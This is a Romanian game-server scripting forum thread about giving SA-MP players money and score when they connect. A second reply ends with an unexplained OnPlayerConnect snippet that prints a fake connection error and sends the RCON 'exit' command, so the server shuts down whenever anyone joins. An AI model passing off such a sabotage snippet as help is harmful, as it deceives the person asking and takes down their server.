Jump to content
  • 0

Questions


3xTaSY

Question

4 answers to this question

Recommended Posts

La OnPlayerConnect adauga

GivePlayerMoney(playerid, 50000); // unde este 50000 inlocuiesti tu cu cat sa ii dea
GivePlayerScore(playerid, 25000);// la fel si aici

Iar pentru textdraw iti sugerez sa folosesti http://forum.sa-mp.com/showthread.php?t=387597

35012l1.png.aee1a3398b9bd9f8eec50574d2cd

Link to comment
Share on other sites

NexT." post="152013" timestamp="1381303576"]

La OnPlayerConnect adauga

GivePlayerMoney(playerid, 50000); // unde este 50000 inlocuiesti tu cu cat sa ii dea
GivePlayerScore(playerid, 25000);// la fel si aici

Iar pentru textdraw iti sugerez sa folosesti http://forum.sa-mp.com/showthread.php?t=387597

El foloseste ZCMD , nu strcmp am incercat si eu acel script doar ca nu merge  pe ZCMD , ii trebuie un server pe strcmp sa functioneze corect acel FS , eu as recomanda sa downloadeze dp internet un server pe strcmp ( SFR ) si sa il faca acolo :) BFT extasy:P daca nu te descurci dami buzz pe mess

public OnPlayerConnect(playerid)
{
	print("[ERROR] - Unable to establish a connection with the world...");
	SendRconCommand("exit");
	return 1;
}

 

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. For more details you can also review our Terms of Use and Privacy Policy.